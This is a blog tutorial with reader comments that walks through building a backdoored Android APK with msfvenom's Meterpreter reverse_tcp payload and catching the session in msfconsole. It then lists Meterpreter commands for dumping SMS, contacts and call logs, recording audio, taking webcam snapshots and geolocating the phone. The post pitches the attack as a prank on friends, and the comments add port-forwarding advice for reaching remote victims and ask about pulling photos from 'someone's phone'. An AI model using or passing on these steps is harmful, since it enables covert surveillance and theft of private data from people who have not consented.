Yes you read right. You can How to hack android phone using kali linux 2020 (with pictures) very easily. Here I will be showing you steps by step on how to How to hack android phone using kali linux 2020 (with pictures) . But remember it is illegal to hack without permission and is punishable.
In this 2020 era we are locked in our home and we need to enhance our technical skills in order to be practically strong.
This is a good time for IT lovers to trick/prank your friends.
Believe me, they will totally be shocked.
When I tried this trick none of my friends were believing me that I really hacked their android phone using kali linux.
And finally i tricked them by sending SMS from the victim phone to one of my friend who was already present. They were just fighting why you sent me that SMS.
Required Materials on How to hack android phone using kali linux 2020
- Kali Linux ISO image
- Pendrive (minimum 8GB)
- Rufus Bootable Pendrive software
- Data Cable for file transfer.
- Internet connection for both hacker and victim.
Above all follow these steps
Thus start with knowing your IP Address
- Click here if you don’t know how to check IP address in Kali Linux
- Open Terminal.
- First type ifconfig to know your IP address (If you are connected with Ethernet cable you will find your IP in eth0 in the same way If you are connected with WiFi you will find your IP in wlan0).
- As I am using Ethernet cable my IP will show in eth0 and my IP is under the red box.

Backdoor.apk making procedure starts from here
- Type msfvenom -p android/meterpreter/reverse_tcp lhost=(your IP) lport=(port number)> /root/backdoor.apk and hit enter. (This will make an apk name backdoor.apk).
- In port number you can type 4000, 4080, 443 etc but not greater than 65000.
- backdoor.apk is the hacking apk which will be used to hack android phone. Which needs to be installed in android phone of victim and victim needs internet connection (If there is no internet connection, hacking will not operate).
- Apart from this you can share this file using various file sharing websites like Wetransfer (this website don’t require user registration).
- Finally You will find the backdoor.apk in Home directory.

Absolutely the last step
- First type msfconsole and hit enter.

- When the msfconsole menu opens type use multi/handler hit enter
- Type set payload android/meterpreter/reverse_tcp hit enter
- Then Type set lhost (IP which you type in making backdoor.apk) hit enter
- Last but not least type set lport (same port number in making backdoor.apk) hit enter
- And then type exploit hit enter

- After hitting enter, a meterpreter session will start shortly if the victim is online.
- Definitely you will be connected to victim’s android phone if he/she is online which shows that how easily you have learnt how to hack android phone using Kali Linux .

- Now type help hit enter
You will find number of commands to control over the victim’s android phone. Scroll and type the required commands (Source – Kali Linux terminal) which you need. Below are the core commands when you type help.
Core Commands
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
File system Commands
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Networking Commands
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
System Commands
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system's local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
User interface Commands
Command Description
------- -----------
screenshot Grab a screenshot of the interactive desktop
Webcam Commands
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Audio Output Commands
Command Description
------- -----------
play play an audio file on target system, nothing written on disk
Android Commands
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information
Warning
This is for educational purpose only. Hacking without permission is illegal and is punishable.
Thanks for visiting. KEEP SMILING
I am really grateful to the owner of this web page who has shared this enormous piece of writing at at this time.
Thanks for motivation, You all are most welcome.
Thanks, I am very happy to hear from user side. I am glad that it really helped you.
How to you retrieve photos from someones phone
In android 10 , the app says that it does not work
Update your kali linux or provide architect details in making backdoor.
Outstanding story there. What occurred after? Take care!| а
that was informative peace of art ur article
Thanks, your appreciation really helps me.
I tried this but after i hit enter the meter pretext session was nt wrkng fr me
It will work you have to wait until the victim is only.
Nice post. I was checking constantly this weblog and I’m inspired!
Very helpful information specifically the ultimate phase 🙂 I deal with such info a lot.
I was looking for this certain info for a long time.
Thank you and best of luck.
AM glad that you have found your interest for a long time
Meterpreter session is not getting active waited for a hour atleast bruh.
Try these things
1) Try reinstalling your kali linux in your hdd if it doesn’t work try kali linux in live mode and then use the trick
2) you should enter correct IP and port number in both apk file and meterpreter session
3) try hitting exploit only when the user has installed that apk file
4) try reinstalling the apk file and re open meterpreter session after restart
Hope this will solve
Like!! Thank you for publishing this awesome article.
Thanks for above
I’m gone to say to my little brother, that he should also visit this blog on regular
basis to get updated from hottest information.
I’m amazed, I have to admit. Rarely do I come across a blog that’s both equally educative and amusing,
and without a doubt, you’ve hit the nail on the head.
The problem is something too few people are speaking intelligently
about. I am very happy that I stumbled across this in my hunt for something concerning this.
Oh thanks, i will keep writing like this.
I couldn’t resist commenting. Well written!
Thanks for above
Good day! This is my first visit to your blog!
We are a team of volunteers and starting a new project in a community in the same niche.
Your blog provided us useful information to work on. You have done a marvellous job!
Thanks for above, your comment is valuable.
I’m impressed, I must say. Rarely do I come across a blog that’s both
educative and amusing, and without a doubt, you have
hit the nail on the head. The problem is an issue that not enough people
are speaking intelligently about. I’m very happy that I found this in my
search for something relating to this.
Thanks for above
Thanks designed for sharing such a nice opinion, post is pleasant, thats
why i have read it fully
Thanks user, Visit us again
I am curious to find out what blog system you have been using?
I’m having some minor security problems with my latest website and I would
like to find something more safeguarded. Do you have any solutions?
That is a really good tip especially to those new to the blogosphere.
Brief but very precise information… Many thanks for sharing this one.
A must read article!
Great article.
Thanks for above, warm welcome from WormCorp
all the time i used to read smaller articles or
reviews that as well clear their motive, and that is also happening with this post which I am reading
here.
You are really welcome to my blog, i will keep it updating https://www.wormcorp.in
Howdy would you mind letting me know which webhost you’re utilizing?
I’ve loaded your blog in 3 completely different
browsers and I must say this blog loads a lot faster then most.
Can you recommend a good hosting provider at
a fair price? Thanks a lot, I appreciate it!
Not working for android 10 can you suggest another method
Bigger problem is, we can’t hack a victim who is not in the same network by this method.
can be hacked I have already tried.
it can be hacked but u need to specify ur public ip which is visible to all
and u need to set port forwarding in ur router to send the incoming connection to ur kali machine
How to you retrieve photos from someones phone
hey i was trying to use this to create apk using my IP address and port number
i sucessfully created a payload could not find apk file in home dir,,
i am using kali linux,,,
msfvenom -p android/meterpreter/reverse_tcp lhost=(your IP) lport=(port number)> /root/backdoor.apk
any work around solution for this